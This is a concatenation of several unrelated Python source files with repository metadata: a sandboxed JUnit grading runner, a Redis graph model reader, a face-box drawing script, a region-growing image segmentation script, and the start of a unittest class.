        super(DirectoryError, self).__init__(value)
class SRCError(Exception):
    """Raised when the extracted source directory cannot be determined."""
    def __init__(self, value):
        # Keep .value for existing callers, but also pass the message to
        # Exception so str(exc) is meaningful (original passed nothing).
        self.value = value
        super(SRCError, self).__init__(value)
def copy_junit_tests(project, working_directory, buffer_size):
    """
    Creates JUNIT directory structure in ANT_TESTS_DIR_NAME
    and extract the project tests in it.
    @param project the project to run, we extract the tests in it
    @param working_directory is a random folder name for this run of the project
    @param buffer_size is provided by FILE_BUFFER_SIZE in config
    """
    tests_dir = os.path.join(
        working_directory, app.config['ANT_TESTS_DIR_NAME'])
    app.logger.info('using {0} as test directory initially'.format(tests_dir))
    os.mkdir(tests_dir)
    # Write each junit in the project to the tests dir.
    # Each `junit` is a chunked file-like object (presumably GridFS --
    # TODO confirm); stream it rather than loading it whole.
    for junit in project.tests:
        with open(os.path.join(tests_dir, junit.filename), "wb") as outfile:
            buff = junit.read(buffer_size)
            while len(buff) != 0:
                outfile.write(buff)
                buff = junit.read(buffer_size)
def prepare_for_source(submission, enumerator, in_use_names, working_directory):
    """
    Makes sure the source archive can be written and extracted without
    overwriting any existing files.

    Renames clashing directory entries to fresh tokens from *enumerator*
    and returns a dict of {original_name: new_name}.
    """
    renamed_files = {}
    src_arch_name = submission.code.get().filename
    # Archive name without its extension -- the name the archive will
    # likely extract to.
    arch_no_ext_nm = src_arch_name.split('.')[0]
    if arch_no_ext_nm in in_use_names:
        renamed_files[arch_no_ext_nm] = enumerator.get_token()
        move(os.path.join(working_directory, arch_no_ext_nm),
             os.path.join(working_directory, renamed_files[arch_no_ext_nm]))
    if src_arch_name in in_use_names and src_arch_name != arch_no_ext_nm:
        renamed_files[src_arch_name] = enumerator.get_token()
        # BUG FIX: the original moved the extension-less path here a second
        # time; the clashing entry in this branch is the one named exactly
        # like the full archive filename.
        move(os.path.join(working_directory, src_arch_name),
             os.path.join(working_directory, renamed_files[src_arch_name]))
    return renamed_files
def extract_source(submission, working_directory, buffer_size):
    """Writes the source archive into working_directory and extracts it.

    Raises DirectoryError when the directory entry count does not grow as
    expected after the write or the extraction (sanity checks).
    """
    # Copy archive
    abs_arch_name = os.path.join(
        working_directory, submission.code.get().filename)
    prev_entry_count = len(os.listdir(working_directory))
    with open(abs_arch_name, "wb") as archive_out:
        # submission.code is a chunked file-like object; stream it to disk.
        buff = submission.code.read(buffer_size)
        while len(buff) != 0:
            archive_out.write(buff)
            buff = submission.code.read(buffer_size)
    after_entry_count = len(os.listdir(working_directory))
    if after_entry_count < prev_entry_count + 1:
        message = 'Working directory entry count assertion failed. Before write {0} after write {1}'.format(
            prev_entry_count, after_entry_count)
        app.logger.error(message)
        raise DirectoryError(message)
    # Extract archive
    prev_entry_count = after_entry_count
    patoolib.extract_archive(abs_arch_name, outdir=working_directory)
    after_entry_count = len(os.listdir(working_directory))
    # The archive is deleted after counting so only extracted content remains.
    os.remove(abs_arch_name)
    if after_entry_count < prev_entry_count + 1:
        message = 'Working directory entry count assertion failed. Before extraction {0} after extraction {1}'.format(
            prev_entry_count, after_entry_count)
        app.logger.error(message)
        raise DirectoryError(message)
def determine_src_dir(in_use_names, renamed_files, working_directory):
    """Attempts to determine the extracted source directory name.

    The source directory is the single entry of working_directory that is
    neither a pre-existing name nor one of the renamed entries.

    Raises SRCError when zero or several candidates remain.
    """
    candidates = [entry for entry in os.listdir(working_directory)
                  if (entry not in in_use_names) and (entry not in renamed_files.values())]
    if len(candidates) != 1:
        # BUG FIX: the original format string reused placeholder {1} (so
        # in_use_names was never shown) and passed dict.items() tuples to
        # str.join, which raised TypeError while building the message.
        message = ('Could not determine working directory. Candidates {0},\n'
                   'directory entries {1},\nrenamed_files {2},\nin_use_names: {3}')
        message = message.format(
            ','.join(candidates),
            ','.join(os.listdir(working_directory)),
            ','.join('{0}->{1}'.format(k, v) for k, v in renamed_files.items()),
            ','.join(in_use_names))
        app.logger.error(message)
        raise SRCError(message)
    else:
        return candidates[0]
def create_ant_build_file(project, in_use_names, renamed_files, working_directory):
    """Creates the ant build file (build.xml) from the runner template."""
    src_dir = determine_src_dir(in_use_names, renamed_files, working_directory)
    # Paths in build.xml are relative not absolute.
    context = {
        "src_dir": src_dir,
        "tests_dir": renamed_files.get(app.config['ANT_TESTS_DIR_NAME'], app.config['ANT_TESTS_DIR_NAME']),
        "plain_format": False,
        "xml_format": True,
        "build_dir": renamed_files.get(app.config['ANT_BUILD_DIR_NAME'], app.config['ANT_BUILD_DIR_NAME']),
        "has_tests": project.has_tests,
        "has_class_files": project.has_class_files,
        "working_directory": working_directory,
        "test_files": [test.filename for test in project.tests]
    }
    if project.has_class_files:
        # Pre-compiled tests: only the .class entries are listed.
        context["test_classes"] =\
            [test.filename for
             test in project.tests if test.filename.endswith(".class")]
    else:
        # Source tests: ant compiles them, so map .java names to .class.
        context["test_classes"] =\
            [test.filename.replace('.java', '.class') for test in project.tests]
    ant_build_template = render_template('runner/build.xml', **context)
    build_abs_fname = os.path.join(
        working_directory, renamed_files.get(app.config['ANT_BUILD_FILE_NAME'], app.config['ANT_BUILD_FILE_NAME']))
    with open(build_abs_fname, "w") as script_file:
        script_file.write(ant_build_template)
def create_ant_script_file(project, in_use_names, renamed_files, working_directory):
    """Creates the ant runner shell script and marks it executable."""
    script_abs_fname = os.path.join(working_directory, renamed_files.get(
        app.config['ANT_RUN_FILE_NAME'], app.config['ANT_RUN_FILE_NAME']))
    context = {
        'buildfile_name': renamed_files.get(app.config['ANT_BUILD_FILE_NAME'], app.config['ANT_BUILD_FILE_NAME']),
        "has_class_files": project.has_class_files,
        'has_tests': project.has_tests,
        'test_timeout': project.test_timeout_seconds
    }
    rendered_script = render_template('runner/ant_script.sh', **context)
    with open(script_abs_fname, "w") as script_file:
        script_file.write(rendered_script)
    # Add owner-execute permission so the sandbox can run it.
    script_st = os.stat(script_abs_fname)
    os.chmod(script_abs_fname, script_st.st_mode | stat.S_IEXEC)
def setup_directory(submission, project, working_directory):
    """
    Sets up the directory layout for an ant run: copies the project's
    JUnit tests, extracts the submission archive, and writes the ant
    build file and run script.

    Returns the {original_name: new_name} dict of renamed entries.
    """
    BUFFER_SIZE = app.config['FILE_BUFFER_SIZE']
    if project.has_tests:
        copy_junit_tests(project, working_directory, BUFFER_SIZE)
    # Names the extraction must not overwrite.
    # BUG FIX: the original concatenated the three config names into one
    # single string ([a + b + c]), so none of the individual build/run/
    # build-dir names were actually protected from clashes.
    in_use_names = os.listdir(working_directory) + [
        app.config['ANT_BUILD_FILE_NAME'],
        app.config['ANT_RUN_FILE_NAME'],
        app.config['ANT_BUILD_DIR_NAME']]
    enumerator = Enumerator(in_use_names)
    renamed_files = prepare_for_source(
        submission, enumerator, in_use_names, working_directory)
    extract_source(submission, working_directory, BUFFER_SIZE)
    app.logger.info('Directory after extraction:[{0}]'.format(
        ','.join(os.listdir(working_directory))))
    before_ant_scripts = len(os.listdir(working_directory))
    create_ant_build_file(
        project, in_use_names, renamed_files, working_directory)
    create_ant_script_file(
        project, in_use_names, renamed_files, working_directory)
    after_ant_scripts = len(os.listdir(working_directory))
    if after_ant_scripts != before_ant_scripts + 1:
        # NOTE(review): this only logs and then proceeds; also two files
        # are written above, so "+ 1" may fire spuriously -- confirm
        # whether the build file and run script share a name.
        message = 'Failed before and after sanity check for ant scripts entries: {0}'.format(
            ','.join(os.listdir(working_directory)))
        app.logger.error(message)
    return renamed_files
def parse_junit_results(test_res_dir, subm):
    """
    Parses XML output. Creates embedded TestResult and TestCase documents.
    Saves each case and result, then saves the submission.
    param: test_res_dir path to directory where reports are.
    param: subm submission document instance.
    """
    files = glob.glob(os.path.join(test_res_dir, '*.xml'))
    # Maps test class name -> aggregated TestResult.
    test_results = {}
    for junit_report in files:
        # Process each junit report
        tree = ET.parse(junit_report)
        for test_case_elm in tree.iterfind('testcase'):
            # Process each test case in a junit file
            class_name = test_case_elm.attrib['classname']
            # class name is something like FooTest which is the class
            # the tests were declared at
            if class_name not in test_results:
                # Create new result if needed
                test_results[class_name] = TestResult(
                    name=class_name, success=True)
            # Populate case
            case = TestCase(
                name=test_case_elm.attrib['name'], passed=True, detail='')
            for failure in test_case_elm.iterfind('failure'):
                # If it has a failure child then it failed.
                case.passed = False
                case.detail += failure.text + '\n'
            for err in test_case_elm.iterfind('error'):
                # If it has an error child then it failed.
                case.passed = False
                case.error = True
                case.detail += err.text + '\n'
            case.save()
            test_results[class_name].cases.append(case)
            # A result succeeds only if every one of its cases passed.
            test_results[class_name].success &= case.passed
    subm.test_results = test_results.values()
    for r in subm.test_results:
        r.save()
    subm.save()
def run_sandbox(working_directory, selinux_directory, renamed_files, submission):
    """Initiates the SELinux sandbox run of the ant script and records the
    submission's compile status and compiler output."""
    command = ['sandbox', '-M', '-H', working_directory, '-T',
               selinux_directory, 'bash',
               renamed_files.get(app.config['ANT_RUN_FILE_NAME'], app.config['ANT_RUN_FILE_NAME'])]
    app.logger.info('Lauching {0}'.format(' '.join(command)))
    process = subprocess.Popen(
        command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    stdout, stderr = process.communicate()
    # Marker string presumably emitted by the generated ant script; the
    # (misspelled) text must match it exactly -- do NOT "fix" the spelling.
    submission.compile_status = ('THE SOURCE WAS COMPILED SUCCESFULLY'
                                 in stderr or 'THE SOURCE WAS COMPILED SUCCESFULLY' in stdout)
    app.logger.info(stderr)
    app.logger.info(stdout)
    submission.compiler_out = stderr + '\n' + stdout
    ant_build_dir_name = renamed_files.get(
        app.config['ANT_BUILD_DIR_NAME'], app.config['ANT_BUILD_DIR_NAME'])
    if submission.compile_status and not ant_build_dir_name in os.listdir(working_directory):
        app.logger.error('Error unknown reason for compilation faliure.')
    # Compilation counts only if the build directory was actually produced.
    submission.compile_status &= ant_build_dir_name in os.listdir(
        working_directory)
def extract_team_grade_submissions(grades):
    """
    Writes each grade's best-submission archive into a temporary directory
    (as arch/Team_<team_id>.<ext>) and returns the directory path.
    NOTE(review): despite the original description, nothing is zipped here;
    the caller receives the populated directory path.
    """
    # First we need to create the temporary directories
    class TempDirectories(object):
        def __enter__(self):
            self.dirs = mkdtemp()
            return self.dirs
        def __exit__(self, type, value, traceback):
            if app.config['CLEAN_TEMP_DIRS']:
                # rmtree(self.dirs[0])
                pass
    buffer_size = app.config['FILE_BUFFER_SIZE']
    working_directory = ''
    with TempDirectories() as directories:
        try:
            working_directory = directories
            arch_dir = os.path.join(working_directory, 'arch')
            os.mkdir(arch_dir)
            app.logger.info('using {0} as directory'.format(working_directory))
            # Populate directory
            for grade in grades:
                submission = grade.best_submission
                src_arch_name = submission.code.get().filename
                src_arch_name_split = src_arch_name.split('.')
                # Keep the original archive extension, rename by team id.
                arch_ext = src_arch_name_split[-1]
                arch_nm = "Team_" + grade.team_id + "." + arch_ext
                abs_arch_name = os.path.join(arch_dir, arch_nm)
                prev_entry_count = len(os.listdir(arch_dir))
                with open(abs_arch_name, "wb") as archive_out:
                    # Stream the chunked file-like code object to disk.
                    buff = submission.code.read(buffer_size)
                    while len(buff) != 0:
                        archive_out.write(buff)
                        buff = submission.code.read(buffer_size)
                after_entry_count = len(os.listdir(arch_dir))
                if after_entry_count < prev_entry_count + 1:
                    message = 'Working directory entry count assertion failed. Before write {0} after write {1}'.format(
                        prev_entry_count, after_entry_count)
                    app.logger.error(message)
                    raise DirectoryError(message)
        except DirectoryError as de:
            print(de.value)
            pass
    print(working_directory)
    return working_directory
def junit_submission(submission, project):
    """Full grading pipeline for one submission: extract it, compile/run it
    in the SELinux sandbox, parse the JUnit reports, and mark it processed.
    Setup failures are recorded as compiler output on the submission."""
    # First we need to create the temporary directories
    class TempDirectories(object):
        def __enter__(self):
            self.dirs = mkdtemp(), mkdtemp()
            return self.dirs
        def __exit__(self, type, value, traceback):
            if app.config['CLEAN_TEMP_DIRS']:
                rmtree(self.dirs[0])
                rmtree(self.dirs[1])
    with TempDirectories() as directories:
        try:
            working_directory, selinux_directory = directories
            app.logger.info('using {0} and {1} as directories'.format(working_directory, selinux_directory))
            # Populate directory
            renamed_files = setup_directory(
                submission, project, working_directory)
            run_sandbox(
                working_directory, selinux_directory, renamed_files, submission)
            if submission.compile_status and project.has_tests:
                # JUnit XML reports live under <build_dir>/tests.
                tests_dir = os.path.join(working_directory,
                                         renamed_files.get(app.config['ANT_BUILD_DIR_NAME'], app.config['ANT_BUILD_DIR_NAME']))
                tests_dir = os.path.join(tests_dir, 'tests')
                parse_junit_results(tests_dir, submission)
            submission.processed = True
            submission.save()
        except DirectoryError as de:
            # Record the failure reason as the compiler output so the
            # submitter sees something rather than a silent failure.
            submission.compile_status = False
            submission.processed = True
            submission.compiler_out = de.value
            submission.save()
        except SRCError as se:
            submission.compile_status = False
            submission.compiler_out = se.value
            submission.processed = True
            submission.save()
| amrdraz/java-project-runner | application/junit.py | junit.py | py | 16,172 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "os.path.join",
"line_number": 80,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 80,
"usage_type": "attribute"
},
{
"api_name": "application.app.config",
"line_number": 81,
"usage_type": "attribute"
},
{
"api_name": "application.app... |
5417912 | import logging
from CosmoTech_Acceleration_Library.Modelops.core.common.graph_handler import VersionedGraphHandler
from CosmoTech_Acceleration_Library.Modelops.core.utils.model_util import ModelUtil
from redis.commands.graph.query_result import QueryResult
logger = logging.getLogger(__name__)
class ModelReader(VersionedGraphHandler):
"""
Model Reader for cached data
"""
def get_twin_types(self) -> list:
"""
Get twin types
:return: twin types list
"""
return [item for sublist in self.graph.labels() for item in sublist]
def get_twins_by_type(self, twin_type: str, limit: int = 0) -> QueryResult:
"""
Get twins by type
:param twin_type: the twin type requested
:param limit: the limit number of twin retrieved
:return: the twin list corresponding to twin type parameter
"""
twin_query = f'MATCH (node:{twin_type}) RETURN node'
if limit != 0:
twin_query = f'{twin_query} LIMIT {str(limit)}'
logger.debug(f"Query : {twin_query}")
return self.graph.query(twin_query, read_only=True)
def get_twin_properties_by_type(self, twin_type: str) -> list:
"""
Get twin properties regarding a twin_type
Note: this will work if all twin (with the same type) have same properties set
:param twin_type: the twin type
:return: the properties list
"""
result = []
twin_result = self.get_twins_by_type(twin_type, 1)
result_set = twin_result.result_set
if result_set and result_set[0]:
for key, val in result_set[0][0].properties.items():
if str(key) != ModelUtil.dt_id_key:
result.append(str(key))
else:
result.append(ModelUtil.id_key)
return result
def get_relationship_types(self) -> list:
"""
Get relationship types
:return: relationship types list
"""
return [item for sublist in self.graph.relationship_types() for item in sublist]
def get_relationships_by_type(self, relationship_type: str, limit: int = 0) -> QueryResult:
"""
Get relationships by type
:param relationship_type: the relationship type requested
:param limit: the limit number of twin retrieved
:return: the relationship list corresponding to relationship type parameter
"""
rel_query = f'MATCH (n)-[relation:{relationship_type}]->(m) RETURN n.{ModelUtil.dt_id_key} as {ModelUtil.source_key}, ' \
f'm.{ModelUtil.dt_id_key} as {ModelUtil.target_key}, relation'
if limit != 0:
rel_query = f'{rel_query} LIMIT {str(limit)}'
logger.debug(f"Query : {rel_query}")
return self.graph.query(rel_query, read_only=True)
def get_relationship_properties_by_type(self, relationship_type: str) -> list:
"""
Get relationship properties regarding a relationship_type
Note: this will work if all relationship (with the same type) have same properties set
:param relationship_type: the relationship type
:return: the properties list
"""
result = [ModelUtil.source_key, ModelUtil.target_key]
relationship_result = self.get_relationships_by_type(relationship_type, 1)
result_set = relationship_result.result_set
if result_set and result_set[0]:
# relationship
for key, val in result_set[0][2].properties.items():
if not str(key) in result:
if str(key) == ModelUtil.dt_id_key:
result.append(ModelUtil.id_key)
elif str(key) != ModelUtil.src_key and str(key) != ModelUtil.dest_key:
result.append(str(key))
return result
def query(self, query: str, params: dict = None, timeout: int = None, read_only: bool = False) -> QueryResult:
    """
    Run the specified query against the graph.
    :param query: the query to run
    :param params: the parameters for the query if any
    :param timeout: a specific timeout (in the unit expected by the graph client)
    :param read_only: executes a readonly query if set to True
    :return: the QueryResult corresponding to specified query
    """
    logger.debug(f"Query : {query} with params : {params}")
    return self.graph.query(q=query, params=params, timeout=timeout, read_only=read_only)
def exists(self, key) -> bool:
    """Return True when *key* is present in Redis, False otherwise.

    ``redis.exists`` reports the number of matching keys, so any
    non-zero count means the key is present.
    """
    return self.r.exists(key) != 0
| Cosmo-Tech/CosmoTech-Acceleration-Library | CosmoTech_Acceleration_Library/Modelops/core/io/model_reader.py | model_reader.py | py | 4,696 | python | en | code | 2 | github-code | 1 | [
{
"api_name": "logging.getLogger",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "CosmoTech_Acceleration_Library.Modelops.core.common.graph_handler.VersionedGraphHandler",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "redis.commands.graph.query_result.QueryR... |
12015108525 |
import os
from dragonEyes.align_dlib import AlignDlib
import csv
import glob
import cv2
from PIL import Image, ImageDraw
import pandas as pd
from random import shuffle
align_dlib = AlignDlib(os.path.join(os.path.dirname(__file__), 'transferredSkills/dlib_models/shape_predictor_68_face_landmarks.dat'))
def draw_on_image(image, out_loc, boxes, face_landmarks_list = None):
    """Draw face bounding boxes (and optional landmark points) onto *image*
    and save the result to *out_loc* as a JPEG.

    :param image: RGB numpy array of the frame
    :param out_loc: destination path for the annotated JPEG
    :param boxes: per-face entries; looks like [label, bounds, score] where
        bounds reads as (top, right, bottom, left) — TODO confirm with caller
    :param face_landmarks_list: optional per-face dicts of named point lists
    """
    #image = utils.loadImage(image_path)
    # Cycle through a fixed palette so each face gets its own color.
    colors = ['blue', 'red', '#7FFF00', 'yellow', '#BF3EFF', '#121212', '#FF69B4', '#FFA54F']
    # Find all facial features in all the faces in the image
    #face_landmarks_list = utils.facePoints(image)
    #boxes = utils.getFaceBounds(image, 2, 'hog')
    pil_image = Image.fromarray(image)
    d = ImageDraw.Draw(pil_image, 'RGBA')
    if face_landmarks_list:
        for i in range(len(face_landmarks_list)):
            color = colors[i%len(colors)]
            face_landmarks = face_landmarks_list[i]
            # Make the eyebrows into a nightmare
            d.point(face_landmarks['left_eyebrow'], fill=color)
            d.point(face_landmarks['right_eyebrow'], fill=color)
            d.point(face_landmarks['chin'], fill=color)
            # lips
            d.point(face_landmarks['top_lip'], fill=color)
            d.point(face_landmarks['bottom_lip'], fill=color)
            '''
            d.polygon(face_landmarks['top_lip'], fill=(150, 0, 0, 128))
            d.polygon(face_landmarks['bottom_lip'], fill=(150, 0, 0, 128))
            d.line(face_landmarks['top_lip'], fill=(150, 0, 0, 64), width=8)
            d.line(face_landmarks['bottom_lip'], fill=(150, 0, 0, 64), width=8)
            '''
            # Close the eye outlines by repeating the first point.
            d.point(face_landmarks['left_eye'] + [face_landmarks['left_eye'][0]], fill=color)
            d.point(face_landmarks['right_eye'] + [face_landmarks['right_eye'][0]], fill=color)
    #print('deferfr', boxes)
    for i in range(len(boxes)):
        #print(boxes[i])
        box = boxes[i][1]
        #print(box[3], box[0]), (box[1], box[2])
        color = colors[i%len(colors)]
        d.rectangle(((box[3], box[0]), (box[1], box[2])), outline = color)
        # Label text goes just below the box.
        d.text((box[3], box[2]), text=boxes[i][0], fill = color)
        #d.text((box[3], box[2]), text=str(boxes[i][2]), fill = color)
    pil_image.save(out_loc, "JPEG")
def _buffer_image(filename):
    """Load an image from disk and return it as an RGB numpy array.

    OpenCV reads in BGR channel order; convert to the RGB layout that
    PIL/dlib-based code downstream expects.
    """
    bgr = cv2.imread(filename, )
    return cv2.cvtColor(bgr, cv2.COLOR_BGR2RGB)
def get_image_details(path):
    """Parse a CSV file into a list of row dicts keyed by the header row.

    Rows longer than the header are truncated (zip semantics), matching the
    original manual header handling. An empty file yields an empty list.

    :param path: path to the CSV file
    :return: list of {header_column: cell_value} dicts, one per data row
    """
    with open(path) as csvfile:
        reader = csv.reader(csvfile, delimiter=',')
        # First row is the header; None means the file had no rows at all.
        header = next(reader, None)
        if header is None:
            return []
        return [dict(zip(header, row)) for row in reader]
def main(img_dir, result):
    """Annotate one frame directory: merge recognition results into the frame's
    CSV, then draw the labelled bounding boxes onto a '<frame>_processed.jpg'.

    :param img_dir: directory named like '<frame>_jpg' containing the frame CSV
    :param result: mapping of segment id -> recognition result; each value
        exposes .accuracy and .person_name — TODO confirm against caller
    """
    #for root, dirs, files in os.walk(img_dir):
    #for file in glob.glob(os.path.join(img_dir,"**/*.csv")):
    file = os.path.join(img_dir, os.path.join(os.path.basename(img_dir).replace('_jpg', '_jpg.csv')))
    df_f = pd.read_csv(file)
    #print(file)
    boxes = []
    #print(file)
    for d in get_image_details(file):
        if len(list(d.keys())) > 0:
            parent_file = os.path.dirname(file).replace('_jpg', '.jpg')
            #print(d)
            # 'bb' looks serialized like '12L, 34L, ...'; the L suffixes are stripped.
            # NOTE(review): tokens with a leading space fail isdigit() and are
            # silently dropped — confirm the 'bb' field format.
            bb = [int(s) for s in d['bb'].replace('L','').split(',') if s.isdigit()]
            r = result[d['segment']]
            # Write the recognition outcome back into the frame's CSV rows.
            df_f.loc[df_f['segment']==d['segment'], 'accuracy'] = r.accuracy
            df_f.loc[df_f['segment']==d['segment'], 'name'] = r.person_name
            boxes.append([r.person_name, bb, r.accuracy])
    #print(os.path.dirname(file).replace('_jpg', '.jpg'))
    out_path = os.path.dirname(file).replace('_jpg', '_processed.jpg')
    #print('o',out_path)
    _image = _buffer_image(os.path.dirname(file).replace('_jpg', '.jpg'))
    draw_on_image(_image, out_path, boxes)
    df_f.to_csv(file, index=False)
if __name__ == '__main__':
    # Ad-hoc smoke test: draw detected boxes/landmarks for every test image.
    # NOTE(review): these imports and the nested _buffer_image/align_dlib
    # shadow the module-level definitions above — presumably leftovers from
    # running this file standalone; confirm before cleaning up.
    import os
    import glob
    import cv2
    from align_dlib import AlignDlib
    align_dlib = AlignDlib(os.path.join(os.path.dirname(__file__), 'transferredSkills/dlib_models/shape_predictor_68_face_landmarks.dat'))
    def _buffer_image(filename):
        # Read as BGR (OpenCV default) and convert to RGB for PIL/dlib.
        image = cv2.imread(filename, )
        image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
        return image
    out_dir = 'tests_output/draw_test'
    if not os.path.exists(out_dir):
        os.makedirs(out_dir)
    image_paths = glob.glob(os.path.join('tests/crop_test', '**/*.jpg'))
    for image in image_paths:
        _image = _buffer_image(image)
        boxes = [ align_dlib._getBoxCoordinates(b) for b in align_dlib.getAllFaceBoundingBoxes(_image)]
        landmarks = align_dlib.facePoints( _image, boxes)
        out_path = os.path.join(out_dir, os.path.basename(image)).replace('.jpg', '') + "_processed.jpg"
        draw_on_image(_image, out_path, boxes, landmarks)
{
"api_name": "dragonEyes.align_dlib.AlignDlib",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "os.path.dir... |
72668388194 | # -*- coding: utf-8 -*-
"""
Created on Wed Aug 25 17:54:25 2021
@author: aktas
"""
# -*- coding: utf-8 -*-
"""
Created on Tue Aug 24 20:14:29 2021
@author: aktas
"""
import cv2
import numpy as np
""" multiple seed region groowing image segmentation. Up to 5 seed can be selected """
def search_new_seed(classified_pixels, seed_x,seed_y,img, region_mean,threshold):
    """Scan forward from (seed_x, seed_y) for the next unclassified pixel whose
    intensity is within *threshold* above the region mean.

    Side effect: the found pixel is appended to *classified_pixels*.
    :return: the found [x, y], or [-1, -1] when no candidate remains.
    """
    img_h, img_w = img.shape
    # NOTE(review): i iterates up to img_w but is used as the FIRST index of
    # img (the row axis, of size img_h) — this only works for square images;
    # confirm whether the axes are intentionally swapped.
    for i in range(seed_x, img_w):
        for k in range(seed_y, img_h):
            if [i,k] in classified_pixels:
                continue
            if img[i][k] <= region_mean + threshold: #pick new seed
                # print("found", i,k)
                classified_pixels.append([i,k])
                return [i,k]
    # print("no neww seed")
    return [-1,-1]
def region_growing(img, seed, threshold, connectivity):
    """Multi-seed region growing segmentation (up to one region per seed).

    :param img: 2-D grayscale image (numpy array)
    :param seed: list of [x, y] seed coordinates, one region per seed
    :param threshold: max absolute intensity difference from the region mean
    :param connectivity: 4 or 8 (neighbourhood used when growing)
    :return: segmented image as a nested Python list; background is 255 and
        each region carries its seed's label (0, 20, 40, ...)
    """
    img_height, img_width = img.shape
    segmented_image = img.copy()
    # NOTE(review): the copy above is immediately discarded; output starts as
    # an all-255 (img_width x img_height) array turned into nested lists.
    segmented_image = np.zeros((img_width,img_height), dtype=img.dtype)
    segmented_image = [[element + 255 for element in sub_im] for sub_im in segmented_image]
    # print(segmented_image)
    seed_quantity = len(seed)
    flags = [1] * seed_quantity # these flags will hold the info about "whether the seed continue growing or it stopped"
    region_means = [0] * seed_quantity # region mean for each region (different region for each seed)
    region_sizes = [1] * seed_quantity # region size for each region (different region for each seed)
    label_list = [0] * seed_quantity # different label for each seed this list will be updated before growing starts
    classified_pixels = [] # we shouldn't visite a neighbor pixel already classified in a region
    visited_pixels_intensities_dif = [] # it wil keep intensity values of each neighbor pixel. After "minimmum" comparison, it well be cleared for the next tour
    print("seed quantity",seed_quantity)
    print("seeds",seed)
    print("flags",flags)
    print("im w im h")
    print(img_width, img_height)
    """ check if connectivity parameter is compatible"""
    if connectivity == 4:
        neighbor_pixels = [(-1, 0), (1, 0), (0, -1), (0, 1)]
    elif connectivity == 8:
        neighbor_pixels = [(-1, -1),(-1, 0), (-1, 1), (1, -1), (1, 0), (1, 1),(0, -1), (0, 1)]
    else:
        raise ValueError("Invalid connectivity choice! put 4 for 4-connectivity and 8 for 8-connectivity")
    """ check if seed parameter is compatible"""
    label = 0
    for i in range(seed_quantity):
        if seed[i][0] < img_width and seed[i][1] < img_height: # if the seed is compatible, initialize the necesseary parts for that seed
            classified_pixels.append(seed[i].copy()) # we should keep the track list about the pixels to see if they are already visited or not
            label_list[i] = label
            segmented_image[seed[i][0]][seed[i][1]] = label #each seed has a unique label so we can keep the different regions via this labels
            label += 20 # change the label for next seed
            region_means[i] = img[seed[i][1]][seed[i][0]] #initialize region means with only seed intensities,
            pass
        else:
            raise ValueError("Invalid seed selection, seed coordinates can't be out of image borders")
    # Grow every still-active seed in lockstep until all pixels are classified
    # or no seed can grow any further.
    while len(classified_pixels) < img_height * img_width and 1 in flags:
        for k in range(seed_quantity):
            if flags[k] == 0:
                continue
            for i in range(connectivity):
                tmpx_visited = seed[k][0] + neighbor_pixels[i][0]
                tmpy_visited = seed[k][1] + neighbor_pixels[i][1]
                if [tmpx_visited,tmpy_visited] in classified_pixels:
                    continue
                if tmpx_visited < img_width and tmpx_visited >= 0 and tmpy_visited < img_height and tmpy_visited >= 0:
                    x_visited = tmpx_visited
                    y_visited = tmpy_visited
                    classified_pixels.append([seed[k][0] + neighbor_pixels[i][0],seed[k][1] + neighbor_pixels[i][1]])
                    if abs(img[y_visited][x_visited] - region_means[k]) <= threshold:
                        # Accept the neighbour: label it and fold its intensity
                        # into the running region mean.
                        segmented_image[seed[k][1] + neighbor_pixels[i][1]][seed[k][0] + neighbor_pixels[i][0]] = label_list[k]
                        region_means[k] = (region_sizes[k] * region_means[k] + img[y_visited][x_visited] ) / (region_sizes[k] + 1)
                        region_sizes[k] += 1
                        last_x_accepted = seed[k][0] + neighbor_pixels[i][0]
                        last_y_accepted = seed[k][1] + neighbor_pixels[i][1]
                        # NOTE(review): last_*_accepted were just assigned
                        # seed + a non-zero offset, so this equality appears
                        # unreachable here — confirm the intended indentation.
                        if seed[k][0] == last_x_accepted and seed[k][1] == last_y_accepted:
                            new_seed = search_new_seed(classified_pixels,last_x_accepted, last_y_accepted,img, region_means[k],threshold)
                            if new_seed == [-1,-1]:
                                flags[k] = 0 #that seed cant grow anymore
                            else:
                                seed[k][0] = new_seed[0]
                                seed[k][1] = new_seed[1]
                        else:
                            seed[k][0] = last_x_accepted
                            seed[k][1] = last_y_accepted
    # print(segmented_image)
    # print("last seed was:", seed[k][0], seed[k][1])
    return segmented_image
# Smoke test on a synthetic 8x8 image: two seeds, threshold 5, 4-connectivity.
img = np.array([[1, 10, 10, 20, 50, 10, 50, 10],
                [50, 1, 1, 1, 1, 1, 1, 10],
                [20, 1, 1, 1, 1, 1, 1, 40],
                [30, 1, 1, 0, 0, 1, 1, 50],
                [40, 1, 1, 0, 0, 1, 1, 20],
                [100, 1, 1, 1, 1, 1, 1, 30],
                [10, 1, 1, 1, 1, 1, 1, 10],
                [10, 100, 250, 250, 220, 200, 20, 10]])
print(img)
output = region_growing(img, [[1,1],[7,7]] ,5, 4)
print(output)
# Visual check on a real image (requires bi2.jpg next to this script and a display).
img2 = cv2.imread("bi2.jpg", 0)
img2 = cv2.resize(img2, (125,125))
output = region_growing(img2, [[60,60]] ,10, 8)
cv2.imshow("Segmented Image", np.array(output, dtype=img2.dtype))
cv2.waitKey(0)
cv2.destroyAllWindows()
| YCAyca/Image-Segmentation | Region_Growing/region_growing2.py | region_growing2.py | py | 6,262 | python | en | code | 3 | github-code | 1 | [
{
"api_name": "numpy.zeros",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 123,
"usage_type": "call"
},
{
"api_name": "cv2.imread",
"line_number": 135,
"usage_type": "call"
},
{
"api_name": "cv2.resize",
"line_number": ... |
70755604514 | import unittest2
import os
import tempfile
import top
from top.utils.files import (copy_file,
remove_files,
get_directory_files_list)
class TestExporterDaemon(unittest2.TestCase):
    """End-to-end tests for top.ExporterDaemon against fixture-loaded DB data
    and throwaway temp directories for signatures, staging and archives."""
    @classmethod
    def setUpClass(cls):
        # Daemon under test, configured entirely against temp dirs so the
        # real filesystem layout is never touched.
        cls._ed = top.ExporterDaemon(pidfile=None)
        cls._ed.set_business_units({'priority': 1, 'fast': 2, 'ipec': 3})
